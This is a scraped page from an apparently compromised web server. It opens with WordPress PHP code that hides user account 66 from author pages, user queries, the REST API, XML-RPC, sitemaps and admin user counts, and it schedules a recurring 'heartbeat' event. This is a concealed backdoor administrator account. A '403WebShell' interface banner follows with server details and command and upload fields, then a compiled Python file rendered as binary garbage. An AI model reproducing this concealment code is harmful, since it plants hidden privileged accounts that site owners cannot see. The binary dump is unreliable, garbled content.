add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/snap/core24/current/lib/python3.12/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/snap/core24/current/lib/python3.12/__pycache__/genericpath.cpython-312.pyc
�

�Цi����dZddlZddlZgd�Zd�Zd�Zd�Zd�Zd�Zd	�Z	d
�Z
d�Zd�Zd
�Z
d�Zd�Zd�Zd�Zej&Gd�d��Zy)z�
Path operations common to more than one OS
Do not use directly.  The OS specific modules import the appropriate
functions from this module themselves.
�N)
�commonprefix�exists�getatime�getctime�getmtime�getsize�isdir�isfile�islink�samefile�sameopenfile�samestat�
ALLOW_MISSINGc�Z�	tj|�y#ttf$rYywxYw)zDTest whether a path exists.  Returns False for broken symbolic linksFT)�os�stat�OSError�
ValueError)�paths �"/usr/lib/python3.12/genericpath.pyrrs0���
����
���
�Z� ����s��*�*c��	tj|�}tj|j
�S#ttf$rYywxYw)z%Test whether a path is a regular fileF)rrrr�S_ISREG�st_mode�r�sts  rr
r
sB���
�W�W�T�]���<�<��
�
�#�#��
�Z� ������6�A�Ac��	tj|�}tj|j
�S#ttf$rYywxYw)z<Return true if the pathname refers to an existing directory.F)rrrr�S_ISDIRr)�srs  rr	r	'sB���
�W�W�Q�Z���<�<��
�
�#�#��
�Z� ����rc��	tj|�}tj|j�S#tttf$rYywxYw)z&Test whether a path is a symbolic linkF)r�lstatrr�AttributeErrorr�S_ISLNKrrs  rrr3sD���
�X�X�d�^���<�<��
�
�#�#��
�Z��0����s�6�A
�A
c�@�tj|�jS)z1Return the size of a file, reported by os.stat().)rr�st_size��filenames rrr<s��
�7�7�8��$�$�$�c�@�tj|�jS)zCReturn the last modification time of a file, reported by os.stat().)rr�st_mtimer&s rrrA���
�7�7�8��%�%�%r(c�@�tj|�jS)z=Return the last access time of a file, reported by os.stat().)rr�st_atimer&s rrrFr+r(c�@�tj|�jS)zAReturn the metadata change time of a file, reported by os.stat().)rr�st_ctimer&s rrrKr+r(c���|syt|dttf�s#tttj
|��}t
|�}t|�}t|�D]\}}|||k7s�|d|cS|S)zGGiven a list of pathnames, returns the longest common leading component�rN)	�
isinstance�list�tuple�mapr�fspath�min�max�	enumerate)�m�s1�s2�i�cs     rrrQsv���R�
�a��d�T�5�M�*��#�b�i�i��#�$��	�Q��B�	�Q��B��"�
����1���1��:��b�q�6�M���Ir(c�j�|j|jk(xr|j|jk(S)z5Test whether two stat buffers reference the same file)�st_ino�st_dev)r;r<s  rrrcs,���I�I����"�
#��I�I����"�$r(c�n�tj|�}tj|�}t||�S)z�Test whether two pathnames reference the same actual file or directory

    This is determined by the device number and i-node number and
    raises an exception if an os.stat() call on either pathname fails.
    )rrr)�f1�f2r;r<s    rrrjs+��
�����B�	�����B��B���r(c�n�tj|�}tj|�}t||�S)z:Test whether two open file objects reference the same file)r�fstatr)�fp1�fp2r;r<s    rr
r
ws)��	���#��B�	���#��B��B���r(c���|j|�}|r|j|�}t||�}|j|�}||kDr*|dz}||kr |||dz|k7r
|d|||dfS|dz
}||kr� ||ddfS)z�Split the extension from a pathname.

    Extension is everything from the last dot to the end, ignoring
    leading dots.  Returns "(root, ext)"; ext may be empty.�Nr)�rfindr8)�p�sep�altsep�extsep�sepIndex�altsepIndex�dotIndex�
filenameIndexs        r�	_splitextrT�s����w�w�s�|�H�
��g�g�f�o���x��-���w�w�v��H��(�� �1��
��h�&���}�Q��/�6�9���(�|�Q�x�y�\�1�1��Q��M��h�&�

�a���e�8�Or(c���dx}}|D]L}t|t�rd}�t|t�rd}�)t|�d|jj
���d�|r|rtd�d�yy)NFTz;() argument must be str, bytes, or os.PathLike object, not z.Can't mix strings and bytes in path components)r2�str�bytes�	TypeError�	__class__�__name__)�funcname�args�hasstr�hasbytesrs     r�_check_arg_typesr_�s�����F�X�
�[���a����F�
��5�
!��H��x�j�)7�78�{�{�7K�7K�6N�P�Q�VZ�
[�
[��(��H�I�t�S��vr(c��eZdZdZd�Zd�Zy)rz$Special value for use in realpath().c��y)Nzos.path.ALLOW_MISSING���selfs r�__repr__zALLOW_MISSING.__repr__�s��&r(c�.�|jjS)N)rYrZrcs r�
__reduce__zALLOW_MISSING.__reduce__�s���~�~�&�&�&r(N)rZ�
__module__�__qualname__�__doc__rergrbr(rrr�s��.�'�'r(r)rjrr�__all__rr
r	rrrrrrrrr
rTr_�object�__new__rrbr(r�<module>rns}���

��(���$�$�$�%�
&�
&�
&��$$����.T����'�'��'r(

Youez - 2016 - github.com/yon3zu
LinuXploit